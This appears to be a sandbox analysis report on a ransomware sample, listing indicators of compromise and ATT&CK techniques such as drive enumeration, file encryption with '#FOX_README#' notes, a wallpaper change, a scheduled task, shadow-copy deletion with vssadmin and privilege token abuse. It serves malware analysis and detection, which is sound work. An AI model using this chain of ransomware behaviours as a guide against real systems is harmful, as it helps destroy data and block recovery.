behavioral10/memory/6896-10525-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 30 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3045580317-3728985860-206385570-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3045580317-3728985860-206385570-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exeMk0Uxuuz64.exe

description	ioc	process
File opened (read-only)	\??\G:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\T:	Mk0Uxuuz64.exe
File opened (read-only)	\??\W:	Mk0Uxuuz64.exe
File opened (read-only)	\??\Z:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\V:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\P:	Mk0Uxuuz64.exe
File opened (read-only)	\??\W:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\M:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\R:	Mk0Uxuuz64.exe
File opened (read-only)	\??\S:	Mk0Uxuuz64.exe
File opened (read-only)	\??\V:	Mk0Uxuuz64.exe
File opened (read-only)	\??\X:	Mk0Uxuuz64.exe
File opened (read-only)	\??\J:	Mk0Uxuuz64.exe
File opened (read-only)	\??\L:	Mk0Uxuuz64.exe
File opened (read-only)	\??\K:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\J:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\B:	Mk0Uxuuz64.exe
File opened (read-only)	\??\Y:	Mk0Uxuuz64.exe
File opened (read-only)	\??\T:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\P:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\I:	Mk0Uxuuz64.exe
File opened (read-only)	\??\M:	Mk0Uxuuz64.exe
File opened (read-only)	\??\O:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\L:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\I:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\E:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\E:	Mk0Uxuuz64.exe
File opened (read-only)	\??\G:	Mk0Uxuuz64.exe
File opened (read-only)	\??\O:	Mk0Uxuuz64.exe
File opened (read-only)	\??\Y:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\U:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\N:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\H:	Mk0Uxuuz64.exe
File opened (read-only)	\??\K:	Mk0Uxuuz64.exe
File opened (read-only)	\??\N:	Mk0Uxuuz64.exe
File opened (read-only)	\??\Q:	Mk0Uxuuz64.exe
File opened (read-only)	\??\U:	Mk0Uxuuz64.exe
File opened (read-only)	\??\R:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\Q:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\Z:	Mk0Uxuuz64.exe
File opened (read-only)	\??\H:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\A:	Mk0Uxuuz64.exe
File opened (read-only)	\??\X:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\S:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

147 myexternalip.com

flow	ioc
147	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\cJdLE5tu.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.INF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\mscordaccore.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jfxwebkit.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-crt-process-l1-1-0.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\System\mfc140.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\acrobat_parcel_generic_32.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MSTAG.TLB	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.LEX	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.ConnectionUI.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Grace-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\de\System.Windows.Controls.Ribbon.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.IO.IsolatedStorage.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Facet.thmx	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\D3DCompiler_47_cor3.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win7_RTL.wmv	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART15.BDR	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOIDRES.DLL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-phn.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN001.XML	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info2x.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-processthreads-l1-1-1.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\FA000000050	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons2x.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.LEX	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dc_logo.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\FileSystemMetadata.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Utilities.v3.5.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5460 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

6164 vssadmin.exe

pid	process
5460	schtasks.exe

pid	process
6164	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exeMk0Uxuuz64.exe

pid	process
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe
5280	Mk0Uxuuz64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

Mk0Uxuuz64.exe

pid process

5280 Mk0Uxuuz64.exe

pid	process
5280	Mk0Uxuuz64.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

powershell.exeMk0Uxuuz64.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	5280	Mk0Uxuuz64.exe
Token: SeLoadDriverPrivilege	5280	Mk0Uxuuz64.exe
Token: SeBackupPrivilege	5760	vssvc.exe
Token: SeRestorePrivilege	5760	vssvc.exe
Token: SeAuditPrivilege	5760	vssvc.exe
Token: SeIncreaseQuotaPrivilege	6788	WMIC.exe
Token: SeSecurityPrivilege	6788	WMIC.exe
Token: SeTakeOwnershipPrivilege	6788	WMIC.exe
Token: SeLoadDriverPrivilege	6788	WMIC.exe
Token: SeSystemProfilePrivilege	6788	WMIC.exe
Token: SeSystemtimePrivilege	6788	WMIC.exe
Token: SeProfSingleProcessPrivilege	6788	WMIC.exe
Token: SeIncBasePriorityPrivilege	6788	WMIC.exe
Token: SeCreatePagefilePrivilege	6788	WMIC.exe
Token: SeBackupPrivilege	6788	WMIC.exe
Token: SeRestorePrivilege	6788	WMIC.exe
Token: SeShutdownPrivilege	6788	WMIC.exe
Token: SeDebugPrivilege	6788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6788	WMIC.exe
Token: SeRemoteShutdownPrivilege	6788	WMIC.exe
Token: SeUndockPrivilege	6788	WMIC.exe
Token: SeManageVolumePrivilege	6788	WMIC.exe
Token: 33	6788	WMIC.exe
Token: 34	6788	WMIC.exe
Token: 35	6788	WMIC.exe
Token: 36	6788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6788	WMIC.exe
Token: SeSecurityPrivilege	6788	WMIC.exe
Token: SeTakeOwnershipPrivilege	6788	WMIC.exe
Token: SeLoadDriverPrivilege	6788	WMIC.exe
Token: SeSystemProfilePrivilege	6788	WMIC.exe
Token: SeSystemtimePrivilege	6788	WMIC.exe
Token: SeProfSingleProcessPrivilege	6788	WMIC.exe
Token: SeIncBasePriorityPrivilege	6788	WMIC.exe
Token: SeCreatePagefilePrivilege	6788	WMIC.exe
Token: SeBackupPrivilege	6788	WMIC.exe
Token: SeRestorePrivilege	6788	WMIC.exe
Token: SeShutdownPrivilege	6788	WMIC.exe
Token: SeDebugPrivilege	6788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6788	WMIC.exe
Token: SeRemoteShutdownPrivilege	6788	WMIC.exe
Token: SeUndockPrivilege	6788	WMIC.exe
Token: SeManageVolumePrivilege	6788	WMIC.exe
Token: 33	6788	WMIC.exe
Token: 34	6788	WMIC.exe
Token: 35	6788	WMIC.exe
Token: 36	6788	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.execmd.execmd.execmd.execmd.execmd.exeMk0Uxuuz.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2076 wrote to memory of 2456	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 2456	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 2456	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3884	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWEyBzO5.exe
PID 2076 wrote to memory of 3884	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWEyBzO5.exe
PID 2076 wrote to memory of 3884	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWEyBzO5.exe
PID 2076 wrote to memory of 1016	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 1016	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 1016	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 1016 wrote to memory of 4532	1016	cmd.exe	powershell.exe
PID 1016 wrote to memory of 4532	1016	cmd.exe	powershell.exe
